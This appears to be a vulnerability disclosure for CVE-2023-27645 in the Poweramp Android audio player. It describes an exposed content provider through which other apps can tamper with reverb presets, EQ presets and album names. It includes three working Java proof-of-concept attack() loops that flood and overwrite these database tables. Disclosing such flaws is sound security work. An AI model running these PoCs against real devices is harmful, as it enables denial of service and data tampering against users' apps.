Escalation of Privileges exists in POWERAMP(CVE-2023-27645)
Vendor:POWERAMP(https://powerampapp.com/)
Affected product:Poweramp (com.maxmpz.audioplayer)
Version:build-954-uni
Download link:https://play.google.com/store/apps/details?id=com.maxmpz.audioplayer
Description of the vulnerability for use in the CVE:An issue found in POWERAMP audioplayer build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.
Additional information:Poweramp application is a famous music player used in Android system. During the initialization phase, the application reads data saved in the database. Some of this data is used for UI display, such as album names, while others are used for application function settings, such as reverb and EQ presets. If a malicious application modifies the aforementioned key data in the database, it can cause UI hijacking, such as arbitrary modification of album names, and function manipulation, such as arbitrary setting of reverb effects.
1.After inserting a large amount of data into the database, it will cause the reverb effect preset selection to disappear, the main page UI to fail, no touch feedback, and the attacker can insert any set reverb effect; in addition, the attacker can also modify the value of the original default reverb effect, or even adjust all to zero to make the reverb effect off.
poc:
public void attack(){
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/reverb_presets");
while (true) {
ContentValues contentValues = new ContentValues();
String randomString = getRandomString(5120);
contentValues.put("name","hack");
contentValues.put("_data","1=0.0;2=0.0;3=0.0;4=0.0;5=0.0;6=0.0;7=0.0;8=0.0;");
contentResolver.insert(uri,contentValues);
}
}2.By inserting data into the database or modifying existing data, the attacker can arbitrarily set the initial values of various audio effects or arbitrarily add custom audio effects.
poc:
public void attack(){
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/eq_presets");
while (true) {
ContentValues contentValues = new ContentValues();
String randomString = getRandomString(5120); contentValues.put("_data","31=0.0;62=0.0;125=0.0;250=0.0;500=0.0;1K=0.0;2K=0;4K=0;8K=0;16K=0;preamp=0");
contentResolver.update(uri,contentValues,null,null);
}
}3.Modifying the album name in the database will cause the UI content of the Albums page to be tampered with, and will affect the album display when the song is played.
poc:
public void attack(){
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/albums");
while (true) {
ContentValues contentValues = new ContentValues();
String randomString = getRandomString(5120);
contentValues.put("album",randomString);
contentResolver.update(uri,contentValues,null,null);
}
}


